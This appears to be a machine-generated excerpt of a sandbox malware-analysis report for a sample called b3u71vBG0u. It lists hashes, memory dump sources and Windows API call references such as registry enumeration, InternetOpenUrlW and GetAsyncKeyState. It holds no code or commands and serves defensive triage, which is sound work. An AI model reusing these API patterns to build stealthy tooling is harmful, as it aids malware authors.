                    • Opcode ID: 850798b01621c7cfc42f5f2dee4246b3c7d6c3098db135d0fbd92ac41d6cd3eb
                    • Instruction ID: d0560f59650dde8cd7de4b3f1a89daf1f11600862ba3f50c64bbf060c7f38519
                    • Opcode Fuzzy Hash: 850798b01621c7cfc42f5f2dee4246b3c7d6c3098db135d0fbd92ac41d6cd3eb
                    • Instruction Fuzzy Hash: 5D51CF316087049FD7659F28D849A6BBBE5EFC6320F044B2EF895D3191EB78CE448792
                    APIs
                    • _memset.LIBCMT ref: 007A2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007A2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 007A2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00806890,00000000), ref: 007A2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: dd51d65c91ff69548aa7319cf60c9f764e2faa49cd77f0d91a0222115e00a2e5
                    • Instruction ID: 94250951c2c15c52c61f09d6edab89bcde827879571be886bff9536484898f88
                    • Opcode Fuzzy Hash: dd51d65c91ff69548aa7319cf60c9f764e2faa49cd77f0d91a0222115e00a2e5
                    • Instruction Fuzzy Hash: C7419F302043019FD724DF28D844B1ABBE9AFC6320F14465DF96697293DB78E906CBA2
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007BDAD9
                      • Part of subcall function 007479AB: _memmove.LIBCMT ref: 007479F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 68499a0e1ac7eb474199d3518e851f37740d6598b064717b718fa7a5aba998b3
                    • Instruction ID: 3c9a8fa0523de0500422047339cf123182a4a5820525a791b5fd7f13d5d4192f
                    • Opcode Fuzzy Hash: 68499a0e1ac7eb474199d3518e851f37740d6598b064717b718fa7a5aba998b3
                    • Instruction Fuzzy Hash: 3E317EB1600619EBCF14EF64C885AEFB7B4FF05310B108629E966A7791DB39AD05CB80
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007993F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00799409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00799439
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: d6c42b67778abc6468b9c5dff11391124f5a4cb3b0b40cd4613fbf54f9ef83bf
                    • Instruction ID: 66c18e6f009a9665a80e09213f793fe817dd09e8a74bdb3c97a02d0a62e51ac8
                    • Opcode Fuzzy Hash: d6c42b67778abc6468b9c5dff11391124f5a4cb3b0b40cd4613fbf54f9ef83bf
                    • Instruction Fuzzy Hash: EF21D5B1A00104FBEF18AB64EC89DFFB768DF05350B14811DFA25A72E1DB3D490A9610
                    APIs
                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B1B40
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B1B66
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007B1B96
                    • InternetCloseHandle.WININET(00000000), ref: 007B1BDD
                      • Part of subcall function 007B2777: GetLastError.KERNEL32(?,?,007B1B0B,00000000,00000000,00000001), ref: 007B278C
                      • Part of subcall function 007B2777: SetEvent.KERNEL32(?,?,007B1B0B,00000000,00000000,00000001), ref: 007B27A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                    • String ID:
                    • API String ID: 3113390036-3916222277
                    • Opcode ID: d5d290cd9a3c5df6848c9830adebc0057687e47c69f471bafc5621469c6f5805
                    • Instruction ID: c63f26fe3634e651f7745f99c5b454a0ec668988b4d8159f0b08bf79cdc6fe79
                    • Opcode Fuzzy Hash: d5d290cd9a3c5df6848c9830adebc0057687e47c69f471bafc5621469c6f5805
                    • Instruction Fuzzy Hash: 42219DB1600208BFEB119F609CD9FFF77EDEB49744F90412EF505A6240EA289E0597B5
                    APIs
                      • Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
                      • Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
                      • Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007C66D0
                    • LoadLibraryW.KERNEL32(?), ref: 007C66D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007C66EC
                    • DestroyWindow.USER32(?), ref: 007C66F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 39e685dc3cea26f774f29023fd5a67ac7800c7e96b4d4cf0e8da18fbb3267ad1
                    • Instruction ID: b937948b3065570e207cd00cd7924e883f32caa4af0bdbc62f598a078d768e5e
                    • Opcode Fuzzy Hash: 39e685dc3cea26f774f29023fd5a67ac7800c7e96b4d4cf0e8da18fbb3267ad1
                    • Instruction Fuzzy Hash: BB2177B120020AABEF105E64ECC0FBB37ADEB59368F10462DFA10A21A0D779CC919761
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 007A705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 007A70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007A70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 4e8c3ee4621983b4fcd647bc3a7ff138702c16da3236b5c6b09c1356c251924f
                    • Instruction ID: a923c4743bd330a53fb7a71782eb78824f474b8597614b2a3698b2020cd16153
                    • Opcode Fuzzy Hash: 4e8c3ee4621983b4fcd647bc3a7ff138702c16da3236b5c6b09c1356c251924f
                    • Instruction Fuzzy Hash: 4B216274604209AFDB249F39DC05AAB77B8BF86720F208729FDA1D72D0E7749850CB54
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 007A712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 007A716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007A71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 868e69173d2bb02e10d369eb3f208ce96aeba358897f26b32bf4d762fc56ea5f
                    • Instruction ID: 64bde6a56acc971758be7316cfc8de15f711399fa09159654df914a4f3360cc4
                    • Opcode Fuzzy Hash: 868e69173d2bb02e10d369eb3f208ce96aeba358897f26b32bf4d762fc56ea5f
                    • Instruction Fuzzy Hash: 1C21B6755042099BDB289F68DC04EA9B7E8BFD6720F204B19FDA0D32D0E7749841C755
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007AAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007AAF13
                    • __swprintf.LIBCMT ref: 007AAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,007CF910), ref: 007AAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: c5bce20e773f8181861ca9a268f6453ccd151a5d2bbf8ff53a1fa85745247362
                    • Instruction ID: ef00a15c492345c7e8c267871aaa0b4f8b08d1deddfc27e4cdbecbf6210b8054
                    • Opcode Fuzzy Hash: c5bce20e773f8181861ca9a268f6453ccd151a5d2bbf8ff53a1fa85745247362
                    • Instruction Fuzzy Hash: 78215370A0010DEFCB10DF65CD89DAE7BB9EF89704B108069F909EB251DB75EA41CB61
                    APIs
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                      • Part of subcall function 0079A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079A399
                      • Part of subcall function 0079A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079A3AC
                      • Part of subcall function 0079A37C: GetCurrentThreadId.KERNEL32 ref: 0079A3B3
                      • Part of subcall function 0079A37C: AttachThreadInput.USER32(00000000), ref: 0079A3BA
                    • GetFocus.USER32 ref: 0079A554
                      • Part of subcall function 0079A3C5: GetParent.USER32(?), ref: 0079A3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 0079A59D
                    • EnumChildWindows.USER32(?,0079A615), ref: 0079A5C5
                    • __swprintf.LIBCMT ref: 0079A5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: 713a37d3555bbcaadc54cf697a0dfbdda9dc86767ef1457cff3b755355587b8c
                    • Instruction ID: b508513256b911fcf845bac9eb7b13072a8fe9a9dad7435218c2ffc59710cf73
                    • Opcode Fuzzy Hash: 713a37d3555bbcaadc54cf697a0dfbdda9dc86767ef1457cff3b755355587b8c
                    • Instruction Fuzzy Hash: 76119D71601209BBDF10BF70EC89FEA3779AF49700F044079FA08AA152CB7859458BB5
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007A2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: 3891c086e4dfbd63acf5318c1fb7737d9d6c24aa0dd47713dfc28371185be652
                    • Instruction ID: a1761c3c198c9dd88953fea82f2920920202bfe87c6036ebf602d632678b78cc
                    • Opcode Fuzzy Hash: 3891c086e4dfbd63acf5318c1fb7737d9d6c24aa0dd47713dfc28371185be652
                    • Instruction Fuzzy Hash: 2C110C7091010DEFCF00EFA8D9514FEB7B4BF56304B508669E95667352DB3A5907CB50
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007BEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007BEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007BF07E
                    • CloseHandle.KERNEL32(?), ref: 007BF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: bc9402cfd9038c2c4653645b3b7594bee12aafa5b5b816f8bce3b3bc480ad011
                    • Instruction ID: 917403c96d2cb6552651be404c6401965444c34bf92ef2c26c3aee7f7a965015
                    • Opcode Fuzzy Hash: bc9402cfd9038c2c4653645b3b7594bee12aafa5b5b816f8bce3b3bc480ad011
                    • Instruction Fuzzy Hash: 89812F716047119FD720EF28C88AB6AB7E5AF88B10F14881DF5959B392DB78AD408B51
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 007C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C0038,?,?), ref: 007C10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C03C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007C040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 007C043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 007C0447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: 572af0fc282d11d08d7693d49ac09db54502cf4ee3c521df10e386947e784ebc
                    • Instruction ID: 17f08284faba3437e000bc1ef8cf24156504fc4da2c2815867174515bf84fb5a
                    • Opcode Fuzzy Hash: 572af0fc282d11d08d7693d49ac09db54502cf4ee3c521df10e386947e784ebc
                    • Instruction Fuzzy Hash: 1A516871208240EFC704EB64C885F6BB7E9FF84704F44892DF595872A2DB38E904CB92
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007AE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007AE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007AE8F2
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007AE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007AE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: 24fc3a37df36eef39da43191fa88d803dee51798d17f3e192de797107ed89e52
                    • Instruction ID: 6adf26e3f3871fa23eec1d604818fb618601751ffd4afdec62b94a36b0dfcfed
                    • Opcode Fuzzy Hash: 24fc3a37df36eef39da43191fa88d803dee51798d17f3e192de797107ed89e52
                    • Instruction Fuzzy Hash: 34513C35A00205DFCF01EF64C985AAEBBF5FF49310B1480A9E949AB362CB39ED11DB51
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c6b967f55660792fecb01f112a8adcd2cddb6b604816c219b51fa30ec06823ad
                    • Instruction ID: bed551a4e037207a396cb196b228057381cf19079c6c0481e9cbf3505e325f20
                    • Opcode Fuzzy Hash: c6b967f55660792fecb01f112a8adcd2cddb6b604816c219b51fa30ec06823ad
                    • Instruction Fuzzy Hash: 4241133590028CBFC720DB28CC58FA9BBA5FB09316F14426DF915A72E0D738AE51DA51
                    APIs
                    • GetCursorPos.USER32(?), ref: 00742357
                    • ScreenToClient.USER32(008067B0,?), ref: 00742374
                    • GetAsyncKeyState.USER32(00000001), ref: 00742399
                    • GetAsyncKeyState.USER32(00000002), ref: 007423A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
